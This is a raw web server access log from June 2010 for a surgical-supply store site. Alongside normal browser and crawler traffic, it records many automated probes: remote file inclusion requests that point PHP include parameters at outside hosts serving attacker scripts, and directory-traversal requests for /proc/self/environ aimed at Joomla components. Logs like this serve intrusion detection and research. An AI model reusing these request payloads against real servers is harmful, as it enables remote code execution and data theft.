24.34.97.183 - - [23/Jun/2010:06:26:45 -0400] "GET /images/printheader.jpg HTTP/1.1" 200 11345 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L028AB6654A44870010FC004+WEBSEQ(S0020):1+WEBPGN(S0070):255284+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
24.34.97.183 - - [23/Jun/2010:06:26:45 -0400] "GET /images/items/ALLOOSS2_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L028AB6654A44870010FC004+WEBSEQ(S0020):1+WEBPGN(S0070):255284+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
24.34.97.183 - - [23/Jun/2010:06:26:45 -0400] "GET /images/items/ALLOOSS1_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L028AB6654A44870010FC004+WEBSEQ(S0020):1+WEBPGN(S0070):255284+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
24.34.97.183 - - [23/Jun/2010:06:26:46 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L028AB6654A44870010FC004+WEBSEQ(S0020):1+WEBPGN(S0070):255284+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
24.34.97.183 - - [23/Jun/2010:06:26:46 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L028AB6654A44870010FC004+WEBSEQ(S0020):1+WEBPGN(S0070):255284+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
24.34.97.183 - - [23/Jun/2010:06:26:46 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L028AB6654A44870010FC004+WEBSEQ(S0020):1+WEBPGN(S0070):255284+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
24.34.97.183 - - [23/Jun/2010:06:26:46 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L028AB6654A44870010FC004+WEBSEQ(S0020):1+WEBPGN(S0070):255284+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
24.34.97.183 - - [23/Jun/2010:06:26:46 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L028AB6654A44870010FC004+WEBSEQ(S0020):1+WEBPGN(S0070):255284+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
24.34.97.183 - - [23/Jun/2010:06:26:46 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L028AB6654A44870010FC004+WEBSEQ(S0020):1+WEBPGN(S0070):255284+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
24.34.97.183 - - [23/Jun/2010:06:26:46 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L028AB6654A44870010FC004+WEBSEQ(S0020):1+WEBPGN(S0070):255284+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
24.34.97.183 - - [23/Jun/2010:06:26:46 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L028AB6654A44870010FC004+WEBSEQ(S0020):1+WEBPGN(S0070):255284+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
24.34.97.183 - - [23/Jun/2010:06:26:46 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L028AB6654A44870010FC004+WEBSEQ(S0020):1+WEBPGN(S0070):255284+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
24.34.97.183 - - [23/Jun/2010:06:26:46 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L028AB6654A44870010FC004+WEBSEQ(S0020):1+WEBPGN(S0070):255284+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
67.30.129.57 - - [23/Jun/2010:06:27:00 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:06:27:00 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:06:27:00 -0400] "GET /logs/error_log.Q109121600%20%20//components/com_simpleboard/image_upload.php?sbp=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:06:27:30 -0400] "GET /logs/error_log.Q109121600%20%20//components/com_simpleboard/image_upload.php?sbp=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:06:27:30 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.30.129.57 - - [23/Jun/2010:06:27:30 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
95.108.245.251 - - [23/Jun/2010:06:28:54 -0400] "GET /logs/error_log.Q110031100 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
209.59.12.99 - - [23/Jun/2010:06:29:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
68.109.233.150 - - [23/Jun/2010:06:30:19 -0400] "GET /logs/access_log.Q110051800//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
194.74.11.66 - - [23/Jun/2010:06:30:20 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
194.74.11.66 - - [23/Jun/2010:06:30:20 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
194.74.11.66 - - [23/Jun/2010:06:30:21 -0400] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
194.74.11.66 - - [23/Jun/2010:06:30:21 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.109.233.150 - - [23/Jun/2010:06:30:37 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
67.218.116.169 - - [23/Jun/2010:06:30:26 -0400] "GET /logs/error_log.Q109090400 HTTP/1.1" 200 2479685 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
222.236.47.182 - - [23/Jun/2010:06:31:06 -0400] "GET /logs/access_log.Q110011600//admin/editor2/spaw_control.class.php?spaw_root=http://www.howtolisten.kr/lct/exam3/81/auto2.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.236.47.182 - - [23/Jun/2010:06:31:09 -0400] "GET //index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
222.236.47.182 - - [23/Jun/2010:06:31:14 -0400] "GET //index.php?option=com_virtuemart&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
66.249.71.209 - - [23/Jun/2010:06:32:30 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L826887628B500000E7A802C+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
117.102.100.183 - - [23/Jun/2010:06:33:06 -0400] "GET /xmlrpc.php HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
83.16.100.218 - - [23/Jun/2010:06:34:09 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:34:09 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:34:09 -0400] "GET /logs/access_log.Q109052200%20%20//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:34:30 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:34:30 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:34:30 -0400] "GET /logs/access_log.Q109052200//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.202.243.41 - - [23/Jun/2010:06:34:49 -0400] "GET /logs/error_log.Q110050400/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.813"
68.109.233.150 - - [23/Jun/2010:06:34:58 -0400] "GET /logs/access_log.Q109052400//adxmlrpc.php HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
211.206.120.196 - - [23/Jun/2010:06:35:19 -0400] "GET /logs/error_log.Q110010100%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
95.108.245.251 - - [23/Jun/2010:06:35:35 -0400] "GET /logs/error_log.Q110021200 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.148.93.62 - - [23/Jun/2010:06:35:45 -0400] "GET /logs/error_log.Q110052700/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
211.206.120.196 - - [23/Jun/2010:06:35:49 -0400] "GET /logs/access_log.Q110031400%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
67.148.93.62 - - [23/Jun/2010:06:35:51 -0400] "GET /index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
67.148.93.62 - - [23/Jun/2010:06:36:06 -0400] "GET /logs/access_log.Q110052700/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
83.16.100.218 - - [23/Jun/2010:06:37:03 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:37:03 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:37:03 -0400] "GET /logs/access_log.Q109052700%20%20//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Jun/2010:06:37:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.16.100.218 - - [23/Jun/2010:06:37:33 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:37:33 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:37:33 -0400] "GET /logs/access_log.Q109052700//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
123.125.66.83 - - [23/Jun/2010:06:37:36 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
83.16.100.218 - - [23/Jun/2010:06:37:54 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:37:54 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:37:54 -0400] "GET /logs/access_log.Q109052700//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
74.54.22.2 - - [23/Jun/2010:06:38:32 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
67.195.114.223 - - [23/Jun/2010:06:38:07 -0400] "GET /logs/error_log.Q109080800 HTTP/1.0" 200 3237840 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.15.152.183 - - [23/Jun/2010:06:38:46 -0400] "GET /logs/access_log.Q110053100/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:06:38:46 -0400] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:06:38:47 -0400] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:06:38:58 -0400] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.195.114.223 - - [23/Jun/2010:06:38:37 -0400] "GET /logs/error_log.Q109080800 HTTP/1.0" 200 3237840 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.54.22.2 - - [23/Jun/2010:06:39:27 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
83.16.100.218 - - [23/Jun/2010:06:39:33 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:39:33 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:39:33 -0400] "GET /logs/access_log.Q109052200//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
68.109.233.150 - - [23/Jun/2010:06:39:39 -0400] "GET /logs/access_log.Q110051400//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
68.109.233.150 - - [23/Jun/2010:06:39:40 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
68.109.233.150 - - [23/Jun/2010:06:39:40 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
83.16.100.218 - - [23/Jun/2010:06:39:43 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:39:43 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:39:43 -0400] "GET /logs/access_log.Q109071900%20%20//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:40:10 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:40:10 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:40:11 -0400] "GET /logs/access_log.Q109071900//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:40:13 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:40:13 -0400] "GET /logs/access_log.Q109071900//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:40:15 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:40:31 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:40:31 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:40:37 -0400] "GET /logs/access_log.Q109052200%20%20//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
66.249.71.27 - - [23/Jun/2010:06:40:55 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L02033C553BB4D9008F90094+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.79.138.66 - - [23/Jun/2010:06:40:58 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
212.79.138.66 - - [23/Jun/2010:06:40:58 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
212.79.138.66 - - [23/Jun/2010:06:40:59 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
212.79.138.66 - - [23/Jun/2010:06:40:59 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
83.16.100.218 - - [23/Jun/2010:06:41:15 -0400] "GET /rfi%20/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:41:15 -0400] "GET /logs/rfi%20/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:41:15 -0400] "GET /logs/access_log.Q109052200%20%20/rfi%20/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
220.181.7.129 - - [23/Jun/2010:06:41:25 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
83.16.100.218 - - [23/Jun/2010:06:41:43 -0400] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:41:44 -0400] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:41:44 -0400] "GET /logs/access_log.Q109081200%20%20//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
83.16.100.218 - - [23/Jun/2010:06:42:03 -0400] "GET /logs/access_log.Q109052200//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
